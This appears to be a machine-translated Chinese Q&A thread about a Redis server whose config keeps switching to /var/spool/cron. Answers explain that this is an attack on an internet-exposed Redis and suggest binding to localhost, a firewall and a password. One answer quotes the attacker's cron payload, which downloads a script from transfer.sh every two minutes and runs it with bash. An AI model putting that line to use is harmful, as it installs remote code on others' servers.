Redis config dir定期修改为"/var/spool/cron“;加上;打开.rdb保存失败:权限被拒绝";错误
我已经设置了我的redis服务器,以便Redis config dir定期修改为"/var/spool/cron“;加上;打开.rdb保存失败:权限被拒绝";错误,redis,cron,permission-denied,redis-server,Redis,Cron,Permission Denied,Redis Server,我已经设置了我的redis服务器,以便CONFIG GET dir-->“/var/lib/redis”和CONFIG GET dbfilename-->“redis.rdb” 但是,在我的服务器运行了几个小时或几天后,我开始收到“无法打开.rdb进行保存:权限被拒绝”错误 如果我再次执行CONFIG GET dir-->“/var/spool/cron”和CONFIG GET dbfilename-->“root”。我试着四处寻找,以了解正在发生的事情,但没有结果 如果我只是重新启动我的red
CONFIG GET dir-->“/var/lib/redis”
和CONFIG GET dbfilename-->“redis.rdb”
但是,在我的服务器运行了几个小时或几天后,我开始收到“无法打开.rdb进行保存:权限被拒绝”
错误
如果我再次执行CONFIG GET dir-->“/var/spool/cron”
和CONFIG GET dbfilename-->“root”
。我试着四处寻找,以了解正在发生的事情,但没有结果
如果我只是重新启动我的redis服务器,那么配置将再次重置为我在“redis.conf”文件中设置的原始设置。这似乎只是一个安全问题。现成的redis可通过任何IP地址访问。作为检查这是否是@ItamarHaber建议的安全问题的简单第一步,我只是将redis服务器绑定到localhost,现在问题似乎已经自行解决了。这是一篇帮助我解决这个问题的好文章。这确实是一次攻击。如果在这种情况发生后检查redis键,您将看到很少有像这样的“字符串”键:“Backup1”、“Backup2”、“Backup3” 其价值如下:
"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"
这是为了修改crontab
底线是-不要向世界开放redis端口。这可以通过重启VM、启用UFW防火墙、允许经过授权的ip地址访问来解决。听起来好像有人试图攻击您的服务器。至少要输入一个密码。ItAMARABER认为你是对的。对不起,你应该考虑烧毁服务器,并从刚开始就成为这个攻击的受害者。原来我把路由器上的DMZ设为我机器的IP。。。谢谢我在滚动一个新实例后仅仅几个小时就得到了这个结果,而且忘记了先设置防火墙!redis服务器位于docker容器中。除了尝试重新创建实例之外,我应该做什么?